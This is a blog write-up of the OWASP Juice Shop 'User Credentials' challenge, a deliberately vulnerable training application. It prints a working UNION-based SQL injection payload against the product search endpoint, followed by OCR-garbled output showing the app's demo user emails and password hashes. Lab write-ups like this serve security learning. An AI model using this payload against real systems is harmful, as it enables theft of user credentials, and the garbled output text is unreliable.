Information Security

Hacking OWASP’s Juice Shop Pt 46: User Credentials

Posted on by codeblue04

Challenge: 

Name: User Credentials

Description: Retrieve a list of all user credentials via SQL Injection.

Difficulty: 4 star

Category: Injection

Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html

Tools used:

None.

Resources used:

Database Schema

Methodology: 

In the expanded description for this challenge it is made fairly obvious that this challenge will be very similar to the Database Schema challengefor which a special SQL injection payload had to be crafted. As this time around the target is only the user credential tableit’s handy to have an idea of what the table entries  look like. To gather that informationyou can either complete the Database Schema or Administration Section challenges. The Admin Section challenge requires a few additional steps in terms of using the browser’s developer tools to track down the authentication-details.on file. The end resulthoweveris that the below set of information is what the database tracks about each user.

"createdAt": " "deletedAt" : nun "deluxeToken" . "email": "benderö)juice-sh .op" "id": "isActive" : true "lastLoginIp" : "0.0.0.0" "password • " "assets/ public/images/uploads/default.svg" "profilelmage" : "role": "customer" "totpSecret": " " "updatedAt": " "username" :

Knowing thisit’s just a matter of crafting an SQL query and utilizing the injection syntax (“q=word’)) … query … –“) we used in the Database Schema challenge on the same vulnerable url. Knowing from the Database Schema challenge that the query we craft must seek nine data columns from the User tableand also that there are more than nine columns in that particular tablethe query we’ll use to complete this challenge is somewhat customizable in terms of what data you’re looking to extract from the database. In my caseI chose IDemailpasswordroleisActiveusernamecreatedAtdeletedAtand totpSecret. My query was “none’)) UNION SELECT  idemailpasswordroleisActiveusernamecreatedAtdeletedAttotpSecret FROM Users–“. I then added that query string to the /rest/products/search?q= url and hit enter.

G) localhost:3000/rest/products/search?q=none')) UNIC Kali Training JSON Raw Data Kali Tools Headers Save Copy Collapse All Expand All NetHunter Exploit-DB GHDB MSFU Filter JsaN status : data: nane : description: price: deluxePrice: Image: createdAt: updatedAt : deletedAt: nane : description: price: deluxePrice: Image: createdAt: updatedAt : deletedAt : nane : description: price: deluxePrice: Image: createdAt: updatedAt : deletedAt: "success" "admin@juice-sh.op" "0192323a7bbd7325e516fB69df18b5dO" "admin" "2e2e-11-11 "jim@j sh . op "e541ca7ecf72b8d1286474fc613ese45" "customer" "2e2e-11-11 "bender@j ulce- sh . op" "Oc36e517e3fa95aabf1bbffc6744a4ef" "customer" "2e2e-11-11
You successfully solved a challenge: User Credentials (Retrieve a list of all user credentials via SQL Injection.) x

Prevention and Mitigation Strategies:

OWASP Mitigation Cheat Sheet

Lessons Learned and Things Worth Mentioning: 

I’m slowly getting better at SQL queries. Despite earning an A in my Databases classand having planneddiagrammedand implemented a MySQL database using PHPinjection attacks felt awkward for a long time. It’s nice to see that progress.

Leave a comment Cancel reply